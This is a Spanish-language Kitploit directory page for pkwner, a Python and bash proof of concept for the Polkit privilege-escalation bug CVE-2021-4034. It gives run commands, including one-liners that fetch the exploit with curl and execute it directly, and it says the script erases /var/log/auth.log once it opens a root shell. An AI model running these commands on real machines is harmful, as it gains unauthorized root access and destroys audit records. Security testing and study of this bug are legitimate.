Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
pkwner — Un PoC en python3 y bash para CVE-2021-4034 por Kim Schulz | Kitploit
Herramientas/GitHubGitHub/kimusan/pkwner
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónRed Teaming
GitHubkimusan/pkwner

pkwner

Un PoC en python3 y bash para CVE-2021-4034 por Kim Schulz

Ver Repositorio
237hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
root@kitploit:~
██████╗ ██╗  ██╗██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔══██╗██║ ██╔╝██║    ██║████╗  ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗  ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝  ██╔══██╗
██║     ██║  ██╗╚███╔███╔╝██║ ╚████║███████╗██║  ██║
╚═╝     ╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝
Un PoC en Python3 y BASH para CVE-2021-4034 por Kim Schulz

Introducción

Este es un PoC simple para el error de Polkit recientemente encontrado llamado PwnKit.

Lo hice tanto como script de bash como de python3, solo por diversión.

El problema es muy simple de explotar, pero tiene consecuencias enormes, ya que fácilmente otorga acceso root en la mayoría de las máquinas Linux donde el atacante tiene acceso de usuario local.

Cómo ejecutarlo

Estos scripts son de ejecución única, así que simplemente haz:

root@kitploit:~
python3 pkwner.py

o

root@kitploit:~
bash pkwner.sh

También puedes ejecutarlo directamente desde un servidor web (por ejemplo, este repositorio de GitHub) mediante:

root@kitploit:~
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)

o

root@kitploit:~
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))

En ambos casos debería verse algo así: alt text y alt text

El script creará algunos archivos y carpetas, pero se limpiará solo cuando se abra el shell root; incluso limpiará /var/log/auth.log (porque ¿por qué no?).

Créditos

  • Qualys por encontrar el problema y hacer pública la información
  • Andris Raugulis por hacer uno de los primeros PoCs del que inspirarse
  • MiscGang porque misgang@Kalmarunionen son increíbles
Descargar herramienta